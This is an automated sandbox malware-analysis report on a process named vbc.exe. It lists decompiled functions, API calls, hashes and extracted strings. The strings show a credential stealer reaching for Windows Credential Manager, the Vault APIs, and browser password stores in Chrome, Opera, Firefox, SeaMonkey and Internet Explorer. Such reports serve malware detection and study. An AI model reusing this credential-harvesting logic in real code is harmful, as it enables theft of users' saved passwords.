                                                                                • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403397, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {

				_t2 =  &_a12; // 0x403428
				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
			}



                                                                                0x0040339d
                                                                                0x004033b5

                                                                                APIs
                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileString
                                                                                • String ID: (4@$Server Details
                                                                                • API String ID: 1096422788-3984282551
                                                                                • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                                                • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004084CE, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;
				_t22 = E00406549(0x1c8, __esi);
				_push(0x14);
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}





                                                                                0x004084ce
                                                                                0x004084d6
                                                                                0x004084dc
                                                                                0x004084e1
                                                                                0x004084e3
                                                                                0x004084f3
                                                                                0x00408505
                                                                                0x004084f5
                                                                                0x004084f5
                                                                                0x004084f8
                                                                                0x004084fa
                                                                                0x004084fd
                                                                                0x00408500
                                                                                0x00408500
                                                                                0x00408507
                                                                                0x00408509
                                                                                0x0040850c
                                                                                0x00408514
                                                                                0x00408526
                                                                                0x00408516
                                                                                0x00408516
                                                                                0x00408519
                                                                                0x0040851b
                                                                                0x0040851e
                                                                                0x00408521
                                                                                0x00408521
                                                                                0x00408528
                                                                                0x0040852a
                                                                                0x0040852d
                                                                                0x00408535
                                                                                0x00408547
                                                                                0x00408537
                                                                                0x00408537
                                                                                0x0040853a
                                                                                0x0040853c
                                                                                0x0040853f
                                                                                0x00408542
                                                                                0x00408542
                                                                                0x00408549
                                                                                0x0040854b
                                                                                0x0040854e
                                                                                0x00408556
                                                                                0x00408568
                                                                                0x00408558
                                                                                0x00408558
                                                                                0x0040855b
                                                                                0x0040855d
                                                                                0x00408560
                                                                                0x00408563
                                                                                0x00408563
                                                                                0x0040856b
                                                                                0x00408571

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                                • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406A74, Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00406A74(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E004060FA(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}













                                                                                0x00406a7e
                                                                                0x00406a80
                                                                                0x00406a85
                                                                                0x00406a88
                                                                                0x00406a8f
                                                                                0x00406a92
                                                                                0x00406a96
                                                                                0x00406a99
                                                                                0x00406a9c
                                                                                0x00406aac
                                                                                0x00406a9e
                                                                                0x00406aa0
                                                                                0x00406aa0
                                                                                0x00406ab2
                                                                                0x00406ab8
                                                                                0x00406abc
                                                                                0x00406abf
                                                                                0x00406ad0
                                                                                0x00406ac1
                                                                                0x00406ac3
                                                                                0x00406ac3
                                                                                0x00406ae3
                                                                                0x00406af0
                                                                                0x00406afc
                                                                                0x00406aff
                                                                                0x00406b06
                                                                                0x00406b0c

                                                                                APIs
                                                                                • strlen.MSVCRT ref: 00406A80
                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                                  • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                                  • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                                  • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                                • memcpy.MSVCRT ref: 00406AE3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                • String ID:
                                                                                • API String ID: 3669619086-0
                                                                                • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                                • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: vbc.exe PID: 7044 Parent PID: 4500 vbc.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00411196, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143processlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 004111B6
                                                                                • memset.MSVCRT ref: 004111CB
                                                                                • Process32FirstW.KERNEL32(?,?), ref: 004111E7
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
                                                                                • memset.MSVCRT ref: 00411253
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
                                                                                • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 004112C3
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
                                                                                • free.MSVCRT(?), ref: 0041130D
                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00411356
                                                                                • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                • API String ID: 3536422406-1740548384
                                                                                • Opcode ID: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                • Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
                                                                                • Opcode Fuzzy Hash: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                • Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410168, Relevance: 56.4, APIs: 23, Strings: 9, Instructions: 441COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004101DA
                                                                                • wcsrchr.MSVCRT ref: 004101F2
                                                                                • memset.MSVCRT ref: 004102D9
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326
                                                                                  • Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
                                                                                  • Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11
                                                                                  • Part of subcall function 00408619: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                                                  • Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
                                                                                  • Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                                                  • Part of subcall function 00408619: memset.MSVCRT ref: 00408725
                                                                                  • Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746
                                                                                  • Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
                                                                                  • Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
                                                                                  • Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
                                                                                  • Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421
                                                                                • memset.MSVCRT ref: 004103AA
                                                                                • memset.MSVCRT ref: 004103C6
                                                                                • memset.MSVCRT ref: 004103E2
                                                                                • memset.MSVCRT ref: 004104F9
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
                                                                                  • Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
                                                                                  • Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
                                                                                  • Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07
                                                                                • wcslen.MSVCRT ref: 00410437
                                                                                • wcslen.MSVCRT ref: 00410446
                                                                                • wcslen.MSVCRT ref: 0041048B
                                                                                • wcslen.MSVCRT ref: 0041049A
                                                                                • memset.MSVCRT ref: 00410562
                                                                                • memset.MSVCRT ref: 0041057A
                                                                                • wcslen.MSVCRT ref: 00410593
                                                                                • wcslen.MSVCRT ref: 004105A1
                                                                                • wcslen.MSVCRT ref: 004105FC
                                                                                • wcslen.MSVCRT ref: 0041060A
                                                                                • memset.MSVCRT ref: 0041068A
                                                                                • wcslen.MSVCRT ref: 00410699
                                                                                • wcslen.MSVCRT ref: 00410720
                                                                                • wcslen.MSVCRT ref: 0041072E
                                                                                • wcslen.MSVCRT ref: 004106A7
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                  • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
                                                                                  • Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
                                                                                • String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
                                                                                • API String ID: 3717286792-109336846
                                                                                • Opcode ID: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                                                • Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
                                                                                • Opcode Fuzzy Hash: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
                                                                                • Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004422C7, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
                                                                                • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
                                                                                • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
                                                                                • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
                                                                                • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
                                                                                • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
                                                                                • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
                                                                                • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                • API String ID: 2238633743-2107673790
                                                                                • Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                • Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
                                                                                • Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                • Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F0D5, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F0F8
                                                                                • memset.MSVCRT ref: 0040F10D
                                                                                • memset.MSVCRT ref: 0040F122
                                                                                • memset.MSVCRT ref: 0040F137
                                                                                • memset.MSVCRT ref: 0040F14C
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                • wcslen.MSVCRT ref: 0040F172
                                                                                • wcslen.MSVCRT ref: 0040F183
                                                                                • wcslen.MSVCRT ref: 0040F1BB
                                                                                • wcslen.MSVCRT ref: 0040F1C9
                                                                                • wcslen.MSVCRT ref: 0040F202
                                                                                • wcslen.MSVCRT ref: 0040F210
                                                                                • memset.MSVCRT ref: 0040F296
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                • API String ID: 2775653040-2068335096
                                                                                • Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                • Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
                                                                                • Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                • Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F2E6, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F309
                                                                                • memset.MSVCRT ref: 0040F31E
                                                                                • memset.MSVCRT ref: 0040F333
                                                                                • memset.MSVCRT ref: 0040F348
                                                                                • memset.MSVCRT ref: 0040F35D
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                • wcslen.MSVCRT ref: 0040F383
                                                                                • wcslen.MSVCRT ref: 0040F394
                                                                                • wcslen.MSVCRT ref: 0040F3CC
                                                                                • wcslen.MSVCRT ref: 0040F3DA
                                                                                • wcslen.MSVCRT ref: 0040F413
                                                                                • wcslen.MSVCRT ref: 0040F421
                                                                                • memset.MSVCRT ref: 0040F4A7
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                • API String ID: 2775653040-3369679110
                                                                                • Opcode ID: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                                                • Instruction ID: 627aa7309af3ce9e50a65207db29ad7cec2a96110015b88e099c10597549be0d
                                                                                • Opcode Fuzzy Hash: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                                                • Instruction Fuzzy Hash: B15174729052196ADB20EB51CD85ECF73BC9F54304F5004FBF508F2081EBB96B888B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004090DF, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00409102
                                                                                • memset.MSVCRT ref: 0040911A
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                • wcslen.MSVCRT ref: 00409136
                                                                                • wcslen.MSVCRT ref: 00409145
                                                                                • wcslen.MSVCRT ref: 0040918C
                                                                                • wcslen.MSVCRT ref: 0040919B
                                                                                  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                • API String ID: 2036768262-2114579845
                                                                                • Opcode ID: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                • Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
                                                                                • Opcode Fuzzy Hash: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                • Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040320A, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                  • Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
                                                                                  • Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
                                                                                  • Part of subcall function 00410168: memset.MSVCRT ref: 004102D9
                                                                                  • Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E
                                                                                • memset.MSVCRT ref: 0040330A
                                                                                • memcpy.MSVCRT ref: 0040331C
                                                                                • wcscmp.MSVCRT ref: 00403348
                                                                                • _wcsicmp.MSVCRT ref: 00403385
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                                                • String ID: $J/@
                                                                                • API String ID: 1763786148-830378395
                                                                                • Opcode ID: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                                                • Instruction ID: 978c6ac20941b4c482f16f8c8dbf1af5ea5d331337d981433e161efedc4cfbbc
                                                                                • Opcode Fuzzy Hash: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                                                • Instruction Fuzzy Hash: 36416B71A083819AD730DF61C945A9BB7E8AF85315F004C3FE88D93681EB7896498B5B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410075, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wcslen$memsetwcscatwcscpy
                                                                                • String ID: Login Data$Web Data
                                                                                • API String ID: 3932597654-4228647177
                                                                                • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                                                • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040F026, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F042
                                                                                • memset.MSVCRT ref: 0040F057
                                                                                  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                  • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                                                  • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                                                • wcscat.MSVCRT ref: 0040F080
                                                                                  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                • wcscat.MSVCRT ref: 0040F0A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                • API String ID: 1534475566-1174173950
                                                                                • Opcode ID: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
